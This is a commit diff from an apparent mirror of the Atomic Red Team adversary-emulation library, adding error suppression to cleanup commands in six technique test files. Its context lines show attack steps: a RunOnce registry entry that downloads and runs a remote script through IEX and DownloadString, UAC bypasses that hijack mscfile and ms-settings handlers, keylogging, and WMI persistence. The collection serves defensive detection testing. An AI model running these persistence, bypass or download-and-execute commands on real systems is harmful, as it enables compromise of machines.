security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1056_T1090_CleanupErrors (#844)

Browse Source
This commit is contained in:
tlor89
2020-02-28 13:47:42 -06:00
committed by GitHub
parent 5e8e3e0851
commit 52b99cd654
6 changed files with 7 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1056/T1056.yaml
+1 -1
View File
@@ -22,4 +22,4 @@ atomic_tests:
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: |
Remove-Item $env:TEMP\key.log
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
atomics/T1060/T1060.yaml
+1 -1
View File
@@ -53,4 +53,4 @@ atomic_tests:
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
cleanup_command: |
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
atomics/T1074/T1074.yaml
+1 -1
View File
@@ -40,4 +40,4 @@ atomic_tests:
command: |
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
cleanup_command: |
Remove-Item -Path $env:TEMP\Folder_to_zip.zip
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
atomics/T1084/T1084.yaml
+1 -1
View File
@@ -40,7 +40,7 @@ atomic_tests:
cleanup_command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
atomics/T1086/T1086.yaml
+1 -1
View File
@@ -245,4 +245,4 @@ atomic_tests:
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
cleanup_command: |
Remove:Item #{ads_file}
Remove-Item #{ads_file} -Force -ErrorAction Ignore
atomics/T1088/T1088.yaml
+2 -2
View File
@@ -44,7 +44,7 @@ atomic_tests:
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
cleanup_command: |
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
- name: Bypass UAC using Fodhelper
description: |
@@ -115,7 +115,7 @@ atomic_tests:
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
cleanup_command: |
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
- name: Bypass UAC by Mocking Trusted Directories
description: |